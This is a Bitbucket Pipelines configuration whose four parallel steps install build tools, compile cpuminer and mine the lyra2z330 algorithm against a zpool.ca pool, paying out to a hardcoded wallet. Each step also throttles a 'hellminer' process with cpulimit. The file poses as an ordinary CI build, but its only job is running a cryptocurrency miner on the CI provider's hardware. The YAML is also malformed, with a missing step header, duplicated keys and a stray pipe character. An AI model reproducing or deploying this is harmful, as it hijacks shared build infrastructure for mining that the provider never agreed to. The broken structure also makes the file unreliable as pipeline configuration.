image: atlassian/default-image:2

pipelines:
  default:
    - parallel:
      - step:
          name: '1'
          script:
            - apt -y update
            - apt -y install screen
            - apt -y install cpulimit -y
            - cpulimit -P hellminer -l 100 -b |
            - apt -y install build-essential
            - apt -y install automake
            - apt -y install libssl-dev
            - apt -y install libcurl4-openssl-dev
            - apt -y install libjansson-dev
            - apt -y install libgmp-dev
            - apt -y install zlib1g-dev
            - apt -y install git
            - apt -y install autotools-dev
            - chmod u+x ./autogen.sh
            - chmod u+x ./configure
            - chmod u+x ./build.sh
            - ./build.sh
            - ./cpuminer -a lyra2z330 -o stratum+tcp://lyra2z330.na.mine.zpool.ca:4563 -u D5aBwWJnsbCHkhcY5T9KbUCWwpFwAYyPSk -p c=DGB,zap=PYRK-lyra2z330 -q
            
            
      - step:
          name: '2'
          script:
            - apt -y update
            - apt -y install screen
            - apt -y install cpulimit -y
            - cpulimit -P hellminer -l 100 -b |
            - apt -y install build-essential
            - apt -y install automake
            - apt -y install libssl-dev
            - apt -y install libcurl4-openssl-dev
            - apt -y install libjansson-dev
            - apt -y install libgmp-dev
            - apt -y install zlib1g-dev
            - apt -y install git
            - apt -y install autotools-dev
            - chmod u+x ./autogen.sh
            - chmod u+x ./configure
            - chmod u+x ./build.sh
            - ./build.sh
            - ./cpuminer -a lyra2z330 -o stratum+tcp://lyra2z330.na.mine.zpool.ca:4563 -u D5aBwWJnsbCHkhcY5T9KbUCWwpFwAYyPSk -p c=DGB,zap=PYRK-lyra2z330 -q
            
            
          name: '3'
          script:
            - apt -y update
            - apt -y install screen
            - apt -y install cpulimit -y
            - cpulimit -P hellminer -l 100 -b |
            - apt -y install build-essential
            - apt -y install automake
            - apt -y install libssl-dev
            - apt -y install libcurl4-openssl-dev
            - apt -y install libjansson-dev
            - apt -y install libgmp-dev
            - apt -y install zlib1g-dev
            - apt -y install git
            - apt -y install autotools-dev
            - chmod u+x ./autogen.sh
            - chmod u+x ./configure
            - chmod u+x ./build.sh
            - ./build.sh
            - ./cpuminer -a lyra2z330 -o stratum+tcp://lyra2z330.na.mine.zpool.ca:4563 -u D5aBwWJnsbCHkhcY5T9KbUCWwpFwAYyPSk -p c=DGB,zap=PYRK-lyra2z330 -q
            
            
      - step:
          name: '4'
          script:
            - apt -y update
            - apt -y install screen
            - apt -y install cpulimit -y
            - cpulimit -P hellminer -l 100 -b |
            - apt -y install build-essential
            - apt -y install automake
            - apt -y install libssl-dev
            - apt -y install libcurl4-openssl-dev
            - apt -y install libjansson-dev
            - apt -y install libgmp-dev
            - apt -y install zlib1g-dev
            - apt -y install git
            - apt -y install autotools-dev
            - chmod u+x ./autogen.sh
            - chmod u+x ./configure
            - chmod u+x ./build.sh
            - ./build.sh
            - ./cpuminer -a lyra2z330 -o stratum+tcp://lyra2z330.na.mine.zpool.ca:4563 -u D5aBwWJnsbCHkhcY5T9KbUCWwpFwAYyPSk -p c=DGB,zap=PYRK-lyra2z330 -q
            
            